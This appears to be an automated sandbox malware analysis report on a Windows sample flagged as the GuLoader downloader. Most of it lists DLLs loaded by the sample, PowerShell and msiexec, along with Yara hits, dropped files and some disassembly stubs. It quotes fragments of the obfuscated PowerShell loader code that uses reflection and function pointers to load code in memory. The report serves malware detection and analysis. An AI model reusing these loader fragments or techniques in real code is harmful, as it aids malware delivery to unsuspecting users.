Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Nt8BLNLKN7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1535081452.00000000088E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.1536993111.000000000B405000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1536832874.0000000008DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1228589004.0000000002719000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1529740848.00000000062EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Armmuskler.Fac, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nsr982A.tmp, type: DROPPED

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hocusses $Guddoms98 $Phyllocystic), (Ratihabition @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Festkldnings127 = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retally)), $Revisorkontrolleret).DefineDynamicModule($Chooses, $false).DefineType($Afslutningernes, $Skridtstrrelsens177, [System.Mult

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09420FA0 push eax; ret	2_2_09421351
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB0C6D push edi; retf	11_2_02EB0C7A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB0C45 push ebx; retf	11_2_02EB0C52
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_02EB0C53 push ebx; retf	11_2_02EB0C52
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 11_2_26630FA0 push ss; retf	11_2_26630FA3

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
